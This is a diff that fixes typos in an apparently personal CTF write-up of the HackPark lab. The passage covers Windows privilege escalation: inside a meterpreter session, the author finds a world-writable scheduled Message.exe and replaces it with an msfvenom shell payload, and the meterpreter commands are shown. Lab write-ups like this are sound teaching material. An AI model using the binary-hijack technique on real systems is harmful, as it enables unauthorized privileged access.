bharathkarumudi/bharathkarumudi.github.io/5_HackPark.md

     meterpreter >

-Let see what services are running on the host and if there are any that we can use for exploit. `meterpreter > ps`
+Let see what services are running on the host and if there are any that we can use for exploit `meterpreter > ps`.

-Of all the listed serivices, we can windows scheduler is running.
+Of all the listed services, we can see windows scheduler is running.

      1376  672   WService.exe
      1556  1376  WScheduler.exe

-Navigate to `c:\Program Files (x86)\SystemScheduler\Events` to examine the scheduler logs and the file `20198415519.INI_LOG.txt` shows there is a service `Message.exe` which is running every 30 seconds and file is writable to everyone.
+Navigate to `c:\Program Files (x86)\SystemScheduler\Events` to examine the scheduler logs and the file `20198415519.INI_LOG.txt` shows there is a service `Message.exe` which is running every 30 seconds and the file is writable to everyone.

     100777/rwxrwxrwx  536992   fil   2019-08-04 07:36:42 -0400  Message.exe

- Using the above, we can now replace this file with a malicious code which can spawn a shell with system id.
-We already have a shell code that was generated using msfvenom earlier, so lets upload that to the victim and rename to Message.exe
+ Using the above, we can now replace this file with a malicious code which can spawn a shell.
+We already have a shell code that was generated using `msfvenom` earlier, so lets upload that to the victim and rename to Message.exe

     meterpreter > upload shell.exe
     [*] uploading  : shell.exe -> shell.exe